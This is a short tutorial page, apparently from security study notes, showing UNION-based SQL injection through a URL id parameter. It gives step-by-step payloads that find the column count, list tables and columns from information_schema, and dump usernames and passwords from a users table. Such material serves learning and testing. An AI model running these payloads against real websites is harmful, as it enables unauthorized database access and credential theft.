SQL Injection In The URL

SQL Injection In The URL

Say we have the below URL

http://sumwebsite.com/profile?id=1

First we produce an error with either ['] or [''] and see how the web app reacts. The next step is to determine the number of columns. An example payload for that is below

1 UNION SELECT 1,2,3

You need to keep adding numbers until there is no error back as an output. Once there is no error, your last query dictates the number of columns. Next step is to start crafting your payloads to dumps columns and tables from the database. Make sure to change the URL id to a non-existent value like [0] in the above case. Example payload to determine the database type assuming we got three columns.

0 UNION SELECT 1,2,database()

Example payload to display tables

0 UNION SELECT
1,2,group_concat(table_name) FROM
information_schema.tables WHERE
table_schema = 'hacked'

Example payload to display columns of the table [hacked]

0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'hacked'

Example payload to dump username and password from table [users] in [hacked]

0 UNION SELECT
1,2,group_concat(username,':',password
SEPARATOR '<br>') FROM users
PreviousSQL InjectionNextSQL Injection In The Search Field

Last updated